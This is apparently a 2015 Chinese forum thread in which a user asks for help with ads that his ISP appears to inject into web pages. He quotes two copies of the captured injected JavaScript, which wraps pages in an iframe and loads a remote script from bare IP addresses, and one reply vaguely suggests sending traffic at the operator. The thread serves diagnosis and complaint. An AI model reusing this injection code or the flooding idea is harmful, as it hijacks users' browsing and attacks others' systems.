这是一个创建于 3285 天前的主题,其中的信息可能已经有所发展或是发生改变。
http://ww2.sinaimg.cn/mw690/53aa5cd9jw1eydaagksmij213l0lb0x8.jpg
http://ww2.sinaimg.cn/mw690/53aa5cd9jw1eydaakd9bmj213m0o07bk.jpg
http://ww1.sinaimg.cn/mw690/53aa5cd9jw1eydaapib8jj21380luafl.jpg
http://ww3.sinaimg.cn/mw690/53aa5cd9jw1eydaatwj6aj213p0n8th5.jpg
http://ww2.sinaimg.cn/mw690/53aa5cd9jw1eydab5hs7lj213n0myadj.jpg
上面这几个图是本机上的。下面的则是虚拟机里的截图
http://ww3.sinaimg.cn/mw690/53aa5cd9jw1eydab3f292j20m80go0vm.jpg
http://ww2.sinaimg.cn/mw690/53aa5cd9jw1eydab1f8u0j20m80gowgy.jpg
http://ww1.sinaimg.cn/mw690/53aa5cd9jw1eydaaz39z3j20rd0kc79n.jpg
虚拟机中广告的源码, 2 次的。
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/></head><body style="margin:0px;padding:0px;"><script type="text/javascript">document.write(['<iframe id="r" marginwidth="0" marginheight="0" width="100%" height="',document.documentElement.clientHeight,'" frameborder="0" src="http://www.baidu.com/?_t=1448433264457" scrolling="auto"><','/iframe>'].join(''));var r=document.getElementById('r');r.height=document.documentElement.clientHeight;var a=function(o,e,f){o=o||window.document;if(window.attachEvent){o.attachEvent('on'+e,f);}else{o.addEventListener(e,f,false);}};var i=-1;a(window,'resize',function(){if(i!=-1){clearTimeout(i);i=-1;}i=setTimeout(function(){r.height=document.documentElement.clientHeight;},10);});document.write("<a style='display:none !important' id='_as_anchor_0'></a>");var _as_a={pid:'0',at:0,aw:400,ah:300,au:'http://js001.b0.upaiyun.com/images/1448001994322.jpg',acu:'http://210.209.77.155:82/r?rc=&ct=73&p=1149&pe=1952&ai=32604&w=-11&wp=-30&cot=0&cos=0.1&r=http://www.chunshuitang.com/?utm_source=miaoqu&utm_medium=cps&utm_campaign=1120',apu:'http://210.209.77.155:82/r?rp=&ct=73&p=1149&pe=1952&ai=32604&w=-11&wp=-30&cot=0&cos=0.1'};(function(){var s=document.createElement('script');var h=document.getElementsByTagName('head')[0];s.src='http://210.209.77.155/pd2.js';s.async=true;s.charset='gbk';if(h)h.insertBefore(s,h.firstChild);})();</script></body></html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/></head><body style="margin:0px;padding:0px;"><script type="text/javascript">document.write(['<iframe id="r" marginwidth="0" marginheight="0" width="100%" height="',document.documentElement.clientHeight,'" frameborder="0" src="http://www.baidu.com/?_t=1448434451251" scrolling="auto"><','/iframe>'].join(''));var r=document.getElementById('r');r.height=document.documentElement.clientHeight;var a=function(o,e,f){o=o||window.document;if(window.attachEvent){o.attachEvent('on'+e,f);}else{o.addEventListener(e,f,false);}};var i=-1;a(window,'resize',function(){if(i!=-1){clearTimeout(i);i=-1;}i=setTimeout(function(){r.height=document.documentElement.clientHeight;},10);});document.write("<a style='display:none !important' id='_as_anchor_0'></a>");var _as_a={pid:'0',at:0,aw:400,ah:300,au:'http://js001.b0.upaiyun.com/images/1448001994322.jpg',acu:'http://123.1.175.216:82/r?rc=&ct=73&p=1149&pe=1952&ai=32604&w=-11&wp=-30&cot=0&cos=0.1&r=http://www.chunshuitang.com/?utm_source=miaoqu&utm_medium=cps&utm_campaign=1120',apu:'http://123.1.175.216:82/r?rp=&ct=73&p=1149&pe=1952&ai=32604&w=-11&wp=-30&cot=0&cos=0.1'};(function(){var s=document.createElement('script');var h=document.getElementsByTagName('head')[0];s.src='http://123.1.175.216/pd2.js';s.async=true;s.charset='gbk';if(h)h.insertBefore(s,h.firstChild);})();</script></body></html>
求分析,黑龙江联通,家里和公司都是弹这个广告。已经在运营商投诉,没回复呢,心理没谱,想要理直气壮一点。
 |
1
alect 2015-11-25 16:21:49 +08:00
初步判断是运营商劫持。。
|
 |
2
freep2p OP |
|
3
alect 2015-11-25 16:27:07 +08:00  1
@freep2p 运营商劫持当然不可能每次都劫持,随机性比较大。有时比较隐蔽
基本上目前喜欢嵌套 iframe 页面,你后头发现可能被劫持的时候查看下源码是否有嵌套 iframe 页面 |
|
4
freep2p OP      上面这几个图是本机上的。下面的则是虚拟机里的截图    发现图弄小了,第一次发主题。从贴下图网址。 |
|
5
freep2p OP @alect 等在抓到弹广告看看吧,我的虚拟机只玩过一款老的网游,挂机用的,按理说,虚拟机里应该是干净的。 是否会有主机的软件能劫持虚拟机弹广告呢? 虚拟机是桥接网络。
|
 |
6
eirk2004 2015-11-25 19:25:56 +08:00 1
|
|
7
freep2p OP   接到联通客服的回复,“我们检查了你的线路,并没有什么问题” 我表示要投诉到工信部,“那是你的权利” 。无语了 |
 |
9
lanlanlan 2015-11-25 19:48:15 +08:00
蛤蛤蛤 经历过下 apk 下载成腾讯应用宝的 然后 1W 号投诉 那边回复我 “请卸载腾讯所有软件” (手动 88
|
|
10
eirk2004 2015-11-25 19:59:58 +08:00
@freep2p 学一下 wireshark ,入门不难的。可以先用 HTTPNetworkSniffer 这个小工具,找一下触发劫持的 URL
http://blog.jobbole.com/70907/ |
 |
11
lhbc 2015-11-25 20:04:24 +08:00 via Android
证据并没有卵用
对付运营商的最佳手段是耍无赖 |
|
12
freep2p OP |
|
14
lanlanlan 2015-11-25 20:47:38 +08:00
@freep2p 另外不是我教唆哈 如果你手里自有服务器 可以往他们那边送点流量的 至少个人坚定的认为跟流氓讲道理而自己不吃亏的恐怕只有“混混”了
|
 |
15
zro 2015-11-25 22:28:40 +08:00
目前在用 ADBLOCK 伺候。。。遇到这种带 JS 要刷新几下
|
|
16
freep2p OP |
|
17
freep2p OP 用 wireshark 抓的访问百度的包。那位有工夫,帮讲解分析下,普及下知识。谢过。
http://pan.baidu.com/s/1mgu9lv6 |
|
18
zro 2015-11-26 09:46:49 +08:00
分析它是哪个 DIV ID ,然后 ADB 规则过滤一下,但下次 ADB 拦截会导致整个网页打不开,要刷新一下或几下才行。。
|
 |
20
zoujun3281 2015-11-26 13:09:31 +08:00
终于能说话了,楼主不用这么麻烦,直接去工信部网站投诉宽带运营商,马上就有客服给你打电话了。自从我投诉完再也没见过这样广告。
|
|
21
freep2p OP @zoujun3281 是的,昨天下午工信部的短信提示说,已经受理,转交企业受理,如企业解决的不满意可以再次去投诉。今早联通客服来电话,还是一再说不是他们联通公司的事情。他们没有推送广告之类的。让我去网监大队投诉(网监管这个么?),我表示你们爱承认不承认吧,我看看以后有没有广告,如果有,我还投诉。
情况反馈:貌似刚开机的时候, ie 访问, http 的百度 有很大几率跳出。 原来存放 JS 的两个服务器好像访问不了了,又变成这两个了。 183.86.218.23/pd2.js 183.86.210.31/pd2.js 今天用手机 3G 上网 苹果自带的浏览器 访问百度,居然也出现了。 不同线路的两个电脑(包括虚拟机)、手机 3G 、显示的同一个广告。 同省 不同市的一个网友也弹一个 JS 存放 ip 的类似广告。 如果是链路劫持,这得在哪个路由劫持? 能会是我自己的问题么? 难道真会有黑产的把劫持设备接入上层网络(具体是怎么叫,我也不懂)? 10015 投诉了。在微博里发了,联通的 e 客服给反馈了。 http://weibo.com/p/1001603913366572789341 我在观察观察吧,看之后会不会有广告了。 |
Select Language